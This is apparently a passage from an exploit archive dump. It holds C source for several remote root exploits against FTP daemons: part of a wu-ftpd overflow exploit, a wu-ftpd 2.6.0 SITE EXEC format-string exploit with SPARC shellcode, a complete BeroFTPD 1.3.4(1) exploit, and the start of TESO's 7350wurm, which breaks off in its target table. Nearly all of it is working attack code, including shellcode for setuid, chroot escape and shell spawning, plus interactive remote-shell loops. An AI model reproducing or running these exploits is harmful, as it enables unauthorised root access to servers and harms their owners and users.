printf("Connected to remote host! Sending evil codes.\n");
ftp_login(fd, user, pass);
exploit(fd);
}
int
ftp_cmd_err(int fd, char *command, char *param, char *res, int size, char * msg)
{
xsendftpcmd(fd, command, param);
xrecieveall(fd, res, size);
if (res == NULL)
return 0;
if (verbose)
printf("%s\n", res);
if (msg && (res[0] != '2')) {
fprintf(stderr, "%s\n", msg);
exit(-1);
}
return (res[0] != '2');
}
void shell(int fd)
{
fd_set readfds;
char buf[1];
char *tst = "echo ; echo ; echo HAVE FUN ; id ; uname -a\n";
write(fd, tst, strlen(tst));
while (1) {
FD_ZERO(&readfds);
FD_SET(0, &readfds);
FD_SET(fd, &readfds);
select(fd + 1, &readfds, NULL, NULL, NULL);
if (FD_ISSET(0, &readfds)) {
if (read(0, buf, 1) != 1) {
perror("read");
exit(1);
}
write(fd, buf, 1);
}
if (FD_ISSET(fd, &readfds)) {
if (read(fd, buf, 1) != 1) {
perror("read");
exit(1);
}
write(1, buf, 1);
}
}
}
void do_command(int fd)
{
char buffer[1024];
int len;
if (command_type == CMD_LOCAL) {
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl(command, command, NULL);
exit (2);
}
write(fd, command, strlen(command));
write(fd, "\n", 1);
while ((len = read(fd, buffer, sizeof(buffer))) > 0) {
write(1, buffer, len);
}
exit (0);
}
void execute_command(fd)
{
}
int exploit_ok(int fd)
{
char result[1024];
xsend(fd, "id\n");
xrecieve(fd, result, sizeof(result));
return (strstr(result, "uid=") != NULL);
}
void exploit(int fd)
{
char res[1024];
int heavenlycode_s;
char *dir = NULL;
ftp_cmd_err(fd, "CWD", write_dir, res, 1024, "Can't CWD to write_dir");
dir = strcreat(dir, "A", 255 - strlen(write_dir));
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
xfree(&dir);
/* next on = 256 */
dir = strcreat(dir, "A", 255);
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
xfree(&dir);
/* next on = 512 */
heavenlycode_s = strlen(heavenlycode);
dir = strcreat(dir, "A", 254 - heavenlycode_s);
dir = strcreat(dir, heavenlycode, 1);
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
xfree(&dir);
/* next on = 768 */
dir = strcreat(dir, longToChar(ret_addr), 252 / 4);
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
xfree(&dir);
/* length = 1020 */
/* 1022 moet " zijn */
dir = strcreat(dir, "AAA\"", 1);
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
xfree(&dir);
/* and tell it to blow up */
ftp_cmd_err(fd, "PWD", NULL, res, 1024, NULL);
if (!exploit_ok(fd)) {
if (command != NULL) {
exit (2);
}
fprintf(stderr, "Exploit failed\n");
exit (1);
}
if (command == NULL)
shell(fd);
else
do_command(fd);
}
char *
strcreat(char *dest, char *pattern, int repeat)
{
char *ret;
size_t plen, dlen = 0;
int i;
if (dest)
dlen = strlen(dest);
plen = strlen(pattern);
ret = (char *) xrealloc(dest, dlen + repeat * plen + 1);
if (!dest)
ret[0] = 0x00;
for (i = 0; i < repeat; i++) {
strcat(ret, pattern);
}
return (ret);
}
char *
longToChar(unsigned long blaat)
{
char *ret;
ret = (char *) xmalloc(sizeof(long) + 1);
memcpy(ret, &blaat, sizeof(long));
ret[sizeof(long)] = 0x00;
return (ret);
}
char *
xrealloc(void *ptr, size_t size)
{
char *wittgenstein_was_a_drunken_swine;
if (!(wittgenstein_was_a_drunken_swine = (char *) realloc(ptr, size))) {
fprintf(stderr, "Cannot calculate universe\n");
exit(-1);
}
return (wittgenstein_was_a_drunken_swine);
}
void
xfree(char **ptr)
{
if (!ptr || !*ptr)
return;
free(*ptr);
*ptr = NULL;
}
char *
xmalloc(size_t size)
{
char *heidegger_was_a_boozy_beggar;
if (!(heidegger_was_a_boozy_beggar = (char *) malloc(size))) {
fprintf(stderr, "Out of cheese error\n");
exit(-1);
}
return (heidegger_was_a_boozy_beggar);
}
int
xconnect(char *host, u_short port)
{
struct hostent *he;
struct sockaddr_in s_in;
int fd;
if ((he = gethostbyname(host)) == NULL) {
perror("gethostbyname");
return (-1);
}
memset(&s_in, 0, sizeof(s_in));
s_in.sin_family = AF_INET;
s_in.sin_port = htons(port);
memcpy(&s_in.sin_addr.s_addr, he->h_addr, he->h_length);
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket");
return (-1);
}
if (connect(fd, (const struct sockaddr *) & s_in, sizeof(s_in)) == -1) {
perror("connect");
return (-1);
}
return fd;
}
/* returns status from ftpd */
void
ftp_login(int fd, char *user, char *password)
{
char reply[512];
int rep;
xrecieveall(fd, reply, sizeof(reply));
if (verbose) {
printf("Logging in ..\n");
printf("%s\n", reply);
}
xsendftpcmd(fd, "USER", user);
xrecieveall(fd, reply, sizeof(reply));
if (verbose)
printf("%s\n", reply);
xsendftpcmd(fd, "PASS", password);
xrecieveall(fd, reply, sizeof(reply));
if (verbose)
printf("%s\n", reply);
if (reply[0] != '2') {
printf("Login failed.\n");
exit(-1);
}
}
void
xsendftpcmd(int fd, char *command, char *param)
{
xsend(fd, command);
if (param != NULL) {
xsend(fd, " ");
xsend(fd, param);
}
xsend(fd, "\r\n");
}
void
xsend(int fd, char *buf)
{
if (send(fd, buf, strlen(buf), 0) != strlen(buf)) {
perror("send");
exit(-1);
}
}
void
xrecieveall(int fd, char *buf, int size)
{
char scratch[6];
if (buf == NULL || size == 0) {
buf = scratch;
size = sizeof(scratch);
}
memset(buf, 0, size);
do {
xrecieve(fd, buf, size);
} while (buf[3] == '-');
}
/* recieves a line from the ftpd */
void
xrecieve(int fd, char *buf, int size)
{
char *end;
char ch;
end = buf + size;
while (buf < end) {
if (read(fd, buf, 1) != 1) {
perror("read"); /* XXX */
exit(-1);
}
if (buf[0] == '\n') {
buf[0] = '\0';
return;
}
if (buf[0] != '\r') {
buf++;
}
}
buf--;
while (read(fd, buf, 1) == 1) {
if (buf[0] == '\n') {
buf[0] = '\0';
return;
}
}
perror("read"); /* XXX */
exit(-1);
}
// [2000-12-20]
21 wu-ftpd 2.6.0 Remote Format Strings Exploit
/*
**
** 12:40 11/10/00: Tool for either attack or defense
** within an information warfare setting. Rather, it
** is a small program demonstrating proof of concept.
** Default values for solaris 2.8 and inetd.
**
** If you are not the intended recipient, or a person
** responsible for delivering it to the intended
** recipient, you are not authorised to and must not
** disclose, copy, distribute, or retain this message
** or any part of it. Such unauthorised use may be
** unlawful.If you have received this transmission in
** error,please email us immediately at [email protected]
** so that we can arrange for its return.
**
** kalou <[email protected]>
**
** Usage:
**
** 0xfdc (4060) bytes after the ret position, you have:
**
** -HOSTNAME: anonymous/EGGSHELL
**
** This of course begins on a 4 bytes boundary.
**
** Check your hostname len. Align this with pad to have EGGSHELL on a
** 4 bytes boundary (-p). Localhost needs 2 bytes, for example.
**
** Use '%s' format bug exploitation to look for this string in memory.
** (you have to eat 15 words out of stack).
**
** Remove 0xfdc + len (-HOSTNAME: anonymous/pad) to your found pointer.
** This substracted value is kept as the distance (-d).
** Result is your return address position (-w). Check it if you want.
**
** This code substracts 8 to this address (sparc ret behaviour).
**
** You may use the 102th %p pointer on stack to find the string. eg: ffbef640.
**
** adding 0x870 to this value, I found my string.
**
** offset should be useless. site_padding depends on the '/bin/ftp-exec/'
** config stuff.
**
** (./wu -p 2 -d 0xff4 ; cat ) | nc localhost 21
**
*/
/* Stolener Foundation */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef __linux
#include <getopt.h>
#endif
void *build_format_string(int where,
int what,
int gout,
int eat,
int pad)
{
int expected_len;
int what1, where1;
int what2, where2;
char w1[512];
char w2[512];
int i;
char *buf, *p;
/* generate two %hn len : */
what1 = (what >> 16) & 0xffff;
what2 = what & 0xffff;
fprintf(stderr, "what1: %0x\n", what1);
fprintf(stderr, "what2: %0x\n", what2);
if ( what1 > what2 ) {
where1 = where + 2;
where2 = where;
what1 -= what2;
} else {
where1 = where;
where2 = where + 2;
what2 -= what1;
}
fprintf(stderr, "removing %d.\n", pad + 2 * sizeof(where) + gout +
(eat - 1) * 12);
if (where1 < where2) {
what1 -= pad + 2 * sizeof(where) + (eat - 1) * 12 + gout;
} else {
what2 -= pad + 2 * sizeof(where) + (eat - 1) * 12 + gout;
}
fprintf(stderr, "%08x: writing first %s\n", what,
(where1 > where2) ? "what2" : "what1");
fprintf(stderr, "what1 is %08x, what2 is %08x\n",
what1, what2);
sprintf(w1, "%%0%dx%%hn", what1);
sprintf(w2, "%%0%dx%%hn", what2);
fprintf(stderr, "1: %s\n2: %s\n", w1, w2);
/* calculate expected len : */
expected_len = pad + 12 + (eat - 1) * 8
+ strlen(w1) + strlen(w2) + 1;
fprintf(stderr, "len is %d\n", expected_len);
buf = (char *) malloc(expected_len);
if ( buf == NULL)
return buf;
p = buf;
/* pad */
for (i = 0; i < pad; i++) {
*p++ = '.';
}
/* retaddr, part 1 - first %hn*/
*p++ = (where1 >> 24) & 0xff;
*p++ = (where1 >> 16) & 0xff;
*p++ = (where1 >> 8) & 0xff;
*p++ = (where1) & 0xff;
*p++ = 0x0f;
*p++ = 0x0e;
*p++ = 0x0e;
*p++ = 0x0f; /* so that the first %0(much)x eats something
/* retaddr, part 2 - second %hn */
*p++ = ((where2) >> 24) & 0xff;
*p++ = ((where2) >> 16) & 0xff;
*p++ = ((where2) >> 8) & 0xff;
*p++ = (where2) & 0xff;
/* eaters.. */
for (i = 0; i < (eat - 1); i++) {
strcpy(p, "%000012x");
p += 8;
}
/* what1, what2 */
if (what1 > what2) {
strcpy(p, w1);
strcpy(p + strlen(w1), w2);
} else {
strcpy(p, w2);
strcpy(p + strlen(w2), w1);
}
return buf;
}
void *ftp_escape(void *buf)
{
void *boh;
char *p = buf;
char *r;
boh = malloc(4096);
r = boh;
while (*p) {
*r++ = *p;
if ((*p) == '\xff')
*r++ = *p;
p++;
}
*r = '\0';
return boh;
}
void usage(char *me)
{
fprintf(stderr, "Usage : %s \n"
" [-w where (hexa) ] /* ret position */\n"
" 0 [-o offset ] /* or just offset, or both */\n"
"1010 [-d distance (hex)] /* distance to pass */\n"
" 2 [-s site_pad ] /* padding to site_exec */\n"
" 3 [-p pass_pad ] /* padding to eggshell */\n"
" 4 [-g gout ] /* output size (200-) */\n"
" 15 [-e eat ] /* pointers to eat */\n\n\n",
me);
exit(0);
}
main(int argc, char **argv)
{
char c;
int where, offset, distance, gout, site_pad, pass_pad, eat;
char *buf;
char break_sparc[] =
"\x90\x1b\xc0\x0f" // xor %o7, %o7, %o0
"\x82\x10\x20\x17" // mov 23, %g1
"\x91\xd0\x20\x08" // ta 8 ! setuid(0)
"\xae\x10\x20\x2e" // mov 0x2e, %l7
"\xaf\x2d\xe0\x18" // sll %l7, 24, %l7
"\xee\x23\xbf\xd0" // st %l7, [ %sp - 48 ]
"\x90\x23\xa0\x30" // sub %sp, 48, %o0
"\x82\x10\x20\x05" // mov 5, %g1
"\x92\x1b\xc0\x0f" // xor %o7, %o7, %o1
"\x91\xd0\x20\x08" // ta 8 ! fd = open(".", 0);
"\xa6\x82\x20\x01" // addcc %o0, 1, %l3 !
"\xae\x10\x20\x6b" // mov 0x6b, %l7
"\xaf\x2d\xe0\x18" // sll %l7, 24, %l7
"\xee\x23\xbf\xd0" // st %l7, [ %sp - 48 ]
"\x90\x23\xa0\x30" // sub %sp, 48, %o0
"\x92\x10\x21\xff" // mov 0x1ff, %o1
"\x82\x10\x20\x50" // mov 0x50, %g1
"\x91\xd0\x20\x08" // ta 8 ! mkdir("k", 0755)
"\x90\x23\xa0\x30" // sub %sp, 48, %o0
"\x82\x10\x20\x3d" // mov 0x3d, %g1
"\x91\xd0\x20\x08" // ta 8 ! chroot("k")
"\x90\x24\xe0\x01" // sub %l3, 1, %o0
"\x82\x10\x20\x78" // mov 0x78, %g1
"\x91\xd0\x20\x08" // ta 8 ! fchdir(fd)
"\x2f\x0b\x8b\x8b" // sethi %hi(0x2e2e2c00), %l7
"\xae\x15\xe3\x2e" // or %l7, 0x32e, %l7
"\xee\x23\xbf\xd0" // st %l7, [ %sp - 48 ] ! ../.
"\x2f\x0b\xcb\x8b" // sethi %hi(0x2f2e2c00), %l7
"\xae\x15\xe2\x2f" // or %l7, 0x22f, %l7
"\xee\x23\xbf\xd4" // st %l7, [ %sp - 44 ] ! /../
"\xee\x23\xbf\xd8" // st %l7, [ %sp - 40 ]
"\xee\x23\xbf\xdc" // st %l7, [ %sp - 36 ]
"\xee\x23\xbf\xe0" // st %l7, [ %sp - 32 ]
"\xee\x23\xbf\xe4" // st %l7, [ %sp - 28 ]
"\xee\x23\xbf\xe8" // st %l7, [ %sp - 24 ]
"\xee\x23\xbf\xec" // st %l7, [ %sp - 20 ] ! .././..//..//../(ad lib)
"\xc0\x23\xbf\xf0" // clr [ %sp - 16 ]
"\x82\x10\x20\x0c" // mov 0xc, %g1
"\x90\x23\xa0\x30" // sub %sp, 48, %o0
"\x91\xd0\x20\x08" // ta 8 ! chdir(".././../...")
"\xae\x10\x20\x2e" // mov 0x2e, %l7
"\xaf\x2d\xe0\x18" // sll %l7, 24, %l7
"\xee\x23\xbf\xd0" // st %l7, [ %sp - 48 ] ! stupido. anyway.
"\x90\x23\xa0\x30" // sub %sp, 48, %o0
"\x82\x10\x20\x3d" // mov 0x3d, %g1
"\x91\xd0\x20\x08" // ta 8
"\x2d\x0b\xd8\x9a" // sethi %hi(0x2f62696e), %l6 ! no more mine.
"\xac\x15\xa1\x6e" // or %l6, %lo(0x2f62696e), %l6
"\x2f\x0b\xdc\xda" // sethi %hi(0x2f736800), %l7
"\x90\x0b\x80\x0e" // and %sp, %sp, %o0
"\x92\x03\xa0\x08" // add %sp, 8, %o1
"\x94\x1b\xc0\x0f" // xor %o7, %o7, %o2
"\x9c\x03\xa0\x10" // add %sp, 16, %sp
"\xec\x3b\xbf\xf0" // std %l6, [%sp-16]
"\xd0\x23\xbf\xf8" // st %o0, [%sp-8]
"\xc0\x23\xbf\xfc" // st %g0, [%sp-4]
"\x82\x10\x20\x3b" // mov 59, %g1
"\x91\xd0\x20\x08" // ta 8
"\x91\xd0\x20\x08"; // ta 8
offset = 0;
where = 0xffbeeed4;
distance = 0x1004;
gout = 4;
eat = 15;
site_pad = 2;
pass_pad = 3;
while ( ( c = getopt(argc, argv, "w:o:d:e:g:s:p:") ) != EOF ) {
switch(c) {
case 'w':
where = strtoul(optarg, NULL, 16);
break;
case 'o':
offset = atoi(optarg);
break;
case 'd':
distance = strtoul(optarg, NULL, 16);
break;
case 'e':
eat = atoi(optarg);
break;
case 'g':
gout = atoi(optarg);
break;
case 's':
site_pad = atoi(optarg) % 4;
break;
case 'p':
pass_pad = atoi(optarg) % 4;
break;
default:
usage(argv[0]);
}
}
where += offset;
fprintf(stderr, "ret [%x]:%x\n"
"ppad %d\n"
"spad %d\n"
"gout %d\n"
"eat %d\n",
where, where + distance,
pass_pad, site_pad, gout, eat);
printf("user ftp\n");
buf = ftp_escape(break_sparc);
printf("pass %.*s%s\n", pass_pad, "xxxx", buf);
buf = build_format_string(where, where + distance - 8, gout, eat, site_pad);
buf = ftp_escape(buf);
printf ("site exec %s\n", buf);
}
// [2001-01-03]
21 BeroFTPD 1.3.4(1) Linux x86 Remote Root Exploit
/*
* BeroFTPD 1.3.4(1) Linux x86 remote root exploit
* by qitest1 - 5/05/2001
*
* BeroFTPD is an ftpd derived from wuftpd sources. This code
* exploits the format bug of the site exec cmd, well known to be
* present in wuftpd-2.6.0 and derived daemons. BeroFTPD 1.3.4(1)
* is the current version at the moment.
*
* JUST SAMPLE CODE. For different platforms you have to try with
* different offsets for different retaddrs. You see.. =)
*
* Greets: Nail, Norby, Berserker.
* 69 rulez.. ;P
*/
#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
#include <errno.h>
#include <netdb.h>
#include <unistd.h>
#include <string.h>
#include <netinet/in.h>
struct targ
{
int def;
char *descr;
unsigned long int enbuf;
int dawlen;
};
struct targ target[]=
{
{0, "RedHat 6.2 with BeroFTPD 1.3.4(1) from tar.gz", 0xded, 6},
{1, "Slackware 7.0 with BeroFTPD 1.3.4(1) from tar.gz", 0x1170, 12},
{2, "Mandrake 7.1 with BeroFTPD 1.3.4(1) from rpm", 0xdf1, 6},
{69, NULL, 0, 0}
};
/* 15 byte x86/linux PIC read() shellcode by lorian / teso
*/
unsigned char shellcode_read[] =
"\x33\xdb" /* xorl %ebx, %ebx */
"\xf7\xe3" /* mull %ebx */
"\xb0\x03" /* movb $3, %al */
"\x8b\xcc" /* movl %esp, %ecx */
"\x68\xb2\x00\xcd\x80" /* push 0x80CDxxB2 */
"\xff\xff\xe4"; /* jmp %esp */
unsigned char shellcode[] = /* Lam3rZ code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0"
"\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b"
"\x5e\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x66"
"\xb9\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89"
"\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0"
"\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09"
"\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08"
"\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0"
"\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8"
"\x90\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
"\x2e\x2e\x31\x31";
char fmtstr[1024];
int sock;
int sel;
int offset;
unsigned long int retloc;
unsigned long int bufaddr;
unsigned long int tmpaddr;
void fmtstr_build(unsigned long int bufaddr, unsigned long int retloc);
void xpad_cat (unsigned char *fabuf, unsigned long int addr);
void retloc_find(void);
void shellami(int sock);
void login(void);
void usage(char *progname);
int conn2host(char *host, int port);
main(int argc, char *argv[])
{
char rbuf[1024];
char *host = NULL;
int cnt;
printf("\n BeroFTPD 1.3.4(1) exploit by qitest1\n\n");
if(argc == 1)
usage(argv[0]);
while((cnt = getopt(argc,argv,"h:t:o:")) != EOF)
{
switch(cnt)
{
case 'h':
host = strdup(optarg);
break;
case 't':
sel = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if(host == NULL)
usage(argv[0]);
printf("+Host: %s\n as: %s\n", host, target[sel].descr);
printf("+Connecting to %s...\n", host);
sock = conn2host(host, 21);
printf(" connected\n");
printf("+Receiving banner...\n");
recv(sock, rbuf, 1024, 0);
printf("%s", rbuf);
memset(rbuf, 0, 1024);
printf(" received\n");
printf("+Logging in...\n");
login();
printf(" logged in\n");
printf("+Searching retloc...\n");
retloc_find();
printf(" found: %p\n", retloc);
printf("+Searching bufaddr...\n");
bufaddr = tmpaddr + target[sel].enbuf;
printf(" found: %p + offset = ", bufaddr);
bufaddr += offset;
printf("%p\n", bufaddr);
printf("+Preparing shellcode...\n");
shellcode_read[strlen(shellcode_read)] = (unsigned char) strlen(shellcode);
printf(" shellcode ready\n");
printf("+Building fmtstr...\n");
fmtstr_build(bufaddr, retloc);
printf(" fmtstr builded\n");
printf("+Sending fmtstr...\n");
send(sock, fmtstr, strlen(fmtstr), 0);
printf(" fmtstr sent\n");
recv(sock, rbuf, 1024, 0);
sleep(1);
send(sock, shellcode, strlen(shellcode), 0);
sleep(2);
printf("+Entering love mode...\n"); /* Nail teachs.. ;-) */
shellami(sock);
}
void
fmtstr_build(unsigned long int bufaddr, unsigned long int retloc)
{
int i;
int eat = 136;
int wlen = 428;
int tow;
int freespz;
char f[1024];
unsigned long int soul69 = 0x69696969; /* That's amore.. =) */
unsigned char retaddr[4];
for(i = 0; i < 4; ++i)
retaddr[i] = (bufaddr >> (i << 3)) & 0xff;
wlen -= target[sel].dawlen;
f[0] = 0;
for(i = 0; i < eat; i++)
strcat(f, "%.f");
strcat(fmtstr, "SITE EXEC ");
strcat(fmtstr, " ");
xpad_cat(fmtstr, retloc);
xpad_cat(fmtstr, soul69);
xpad_cat(fmtstr, retloc + 1);
xpad_cat(fmtstr, soul69);
xpad_cat(fmtstr, retloc + 2);
xpad_cat(fmtstr, soul69);
xpad_cat(fmtstr, retloc + 3);
strcat(fmtstr, f);
strcat(fmtstr, "%x");
/* Code by teso
*/
tow = ((retaddr[0] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
tow = ((retaddr[1] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
tow = ((retaddr[2] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
tow = ((retaddr[3] + 0x100) - (wlen % 0x100)) % 0x100;
if (tow < 10) tow += 0x100;
sprintf (fmtstr + strlen (fmtstr), "%%%dd%%n", tow);
wlen += tow;
/* End here
*/
freespz = 510 - strlen(fmtstr) - strlen(shellcode_read) - 1;
for(i = 0; i < freespz ; i++)
strcat(fmtstr, "\x90");
strcat(fmtstr, shellcode_read);
strcat(fmtstr, "\n");
}
/* Code by teso
*/
void xpad_cat (unsigned char *fabuf, unsigned long int addr)
{
int i;
unsigned char c;
for (i = 0 ; i <= 3 ; ++i) {
switch (i) {
case (0):
c = (unsigned char) ((addr & 0x000000ff) );
break;
case (1):
c = (unsigned char) ((addr & 0x0000ff00) >> 8);
break;
case (2):
c = (unsigned char) ((addr & 0x00ff0000) >> 16);
break;
case (3):
c = (unsigned char) ((addr & 0xff000000) >> 24);
break;
}
if (c == 0xff)
sprintf (fabuf + strlen (fabuf), "%c", c);
sprintf (fabuf + strlen (fabuf), "%c", c);
}
return;
}
/* End here
*/
void
retloc_find(void)
{
int i;
char rbuf[1024];
char sbuf[1024];
char *ptr;
strcpy(sbuf, "SITE EXEC ");
for(i = 0; i < 6; i++)
strcat(sbuf, "%p ");
strcat(sbuf, "\n");
send(sock, sbuf, strlen(sbuf), 0);
recv(sock, rbuf, 1024, 0);
ptr = rbuf;
for(i = 0; i < 5; i++)
{
while(*ptr != ' ')
ptr++;
ptr++;
}
ptr[strlen(ptr) - 2] = '\x00';
ptr[strlen(ptr) - 1] = '\x00';
sscanf(ptr, "%p", &retloc);
sscanf(ptr, "%p", &tmpaddr);
retloc -= 0x40;
}
void
shellami(int sock)
{
int n;
char recvbuf[1024];
char *cmd = "id; uname -a\n";
fd_set rset;
send(sock, cmd, strlen(cmd), 0);
while (1)
{
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(sock,&rset))
{
n=read(sock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed by foreign host.\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(sock,recvbuf,n);
}
}
}
return;
}
int
conn2host(char *host, int port)
{
int sockfd;
struct hostent *he;
struct sockaddr_in their_addr;
if ((he=gethostbyname(host)) == NULL)
{
herror("gethostbyname");
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
exit(1);
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(their_addr.sin_zero), 8);
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
perror("connect");
exit(1);
}
return(sockfd);
}
void
login(void)
{
char *user = "USER anonymous\n";
char *pass = "PASS guest@\n";
char rbuf[1024];
send(sock, user, strlen(user), 0);
recv(sock, rbuf, 1024, 0);
memset(rbuf, 0, 1024);
send(sock, pass, strlen(pass), 0);
while(strstr(rbuf, "login ok") == NULL)
{
memset(rbuf, 0, 1024);
recv(sock, rbuf, 1024, 0);
}
}
void
usage(char *progname)
{
int i = 0;
printf("Usage: %s [options]\n", progname);
printf("Options:\n"
" -h hostname\n"
" -t target\n"
" -o offset\n"
"Available targets:\n");
while(target[i].def != 69)
{
printf(" %d) %s\n", target[i].def, target[i].descr);
i++;
}
exit(1);
}
// [2001-05-08]
21 wu-ftpd <= 2.6.1 Remote Root Exploit
/* 7350wurm - x86/linux wu_ftpd remote root exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* The distribution restrictions cover the entire file, including this
* header notice. (This means, you are not allowed to reproduce the header).
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
************************************************** ***************************
* thanks to bnuts, tomas, dvorak, scrippie and max for hints, discussions and
* ideas (synnergy.net rocks, thank you buddies ! :).
*/
#define VERSION "0.2.2"
/* TODO 1. fix chroot break on linux 2.4.x (x >= 13?)
* (ptrace inject on ppid())
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <time.h>
#define INIT_CMD "unset HISTFILE;id;uname -a;\n"
/* shellcodes
*/
unsigned char x86_lnx_loop[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\xfe";
/* x86/linux write/read/exec code (41 bytes)
* does: 1. write (1, "\nsP\n", 4);
* 2. read (0, ncode, 0xff);
* 3. jmp ncode
*/
unsigned char x86_wrx[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xdb\x43\xb8\x0b\x74\x51\x0b\x2d\x01\x01\x01"
"\x01\x50\x89\xe1\x6a\x04\x58\x89\xc2\xcd\x80\xeb"
"\x0e\x31\xdb\xf7\xe3\xfe\xca\x59\x6a\x03\x58\xcd"
"\x80\xeb\x05\xe8\xed\xff\xff\xff";
unsigned char x86_lnx_execve[] =
/* 49 byte x86 linux PIC setreuid(0,0) + chroot-break
* code by lorian / teso
*/
"\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
"\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
"\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
"\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
"\x80"
/* 34 byte x86 linux argv code -sc
*/
"\xeb\x1b\x5f\x31\xc0\x50\x8a\x07\x47\x57\xae\x75"
"\xfd\x88\x67\xff\x48\x75\xf6\x5b\x53\x50\x5a\x89"
"\xe1\xb0\x0b\xcd\x80\xe8\xe0\xff\xff\xff";
/* setreuid/chroot/execve
* lorian / teso */
unsigned char x86_lnx_shell[] =
/* TODO: fix chroot break on 2.4.x series (somewhere between 2.4.6 and
* 2.4.13 they changed chroot behaviour. maybe to ptrace-inject
* on parent process (inetd) and execute code there. (optional)
*/
"\x33\xdb\xf7\xe3\xb0\x46\x33\xc9\xcd\x80\x6a\x54"
"\x8b\xdc\xb0\x27\xb1\xed\xcd\x80\xb0\x3d\xcd\x80"
"\x52\xb1\x10\x68\xff\x2e\x2e\x2f\x44\xe2\xf8\x8b"
"\xdc\xb0\x3d\xcd\x80\x58\x6a\x54\x6a\x28\x58\xcd"
"\x80"
"\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";
typedef struct {
char * desc; /* distribution */
char * banner; /* ftp banner part */
unsigned char * shellcode;
unsigned int shellcode_len;
unsigned long int retloc; /* return address location */
unsigned long int cbuf; /* &cbuf[0] */
} tgt_type;
tgt_type tmanual = {
"manual values",
"unknown banner",
x86_wrx, sizeof (x86_wrx) - 1,
0x41414141, 0x42424242
};
tgt_type targets[] = {
{ "Caldera eDesktop|eServer|OpenLinux 2.3 update "
"[wu-ftpd-2.6.1-13OL.i386.rpm]",
"Version wu-2.6.1(1) Wed Nov 28 14:03:42 CET 2001",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806e2b0, 0x080820a0 },
{ "Debian potato [wu-ftpd_2.6.0-3.deb]",
"Version wu-2.6.0(1) Tue Nov 30 19:12:53 CET 1999",
x86_wrx, sizeof (x86_wrx) - 1,
0x0806db00, 0x0807f520 },
{ "Debian potato [wu-ftpd_2.6.0-5.1.deb]",
"Version wu-2.6.0(1) Fri Jun 23 08:07:11 CEST 2000",
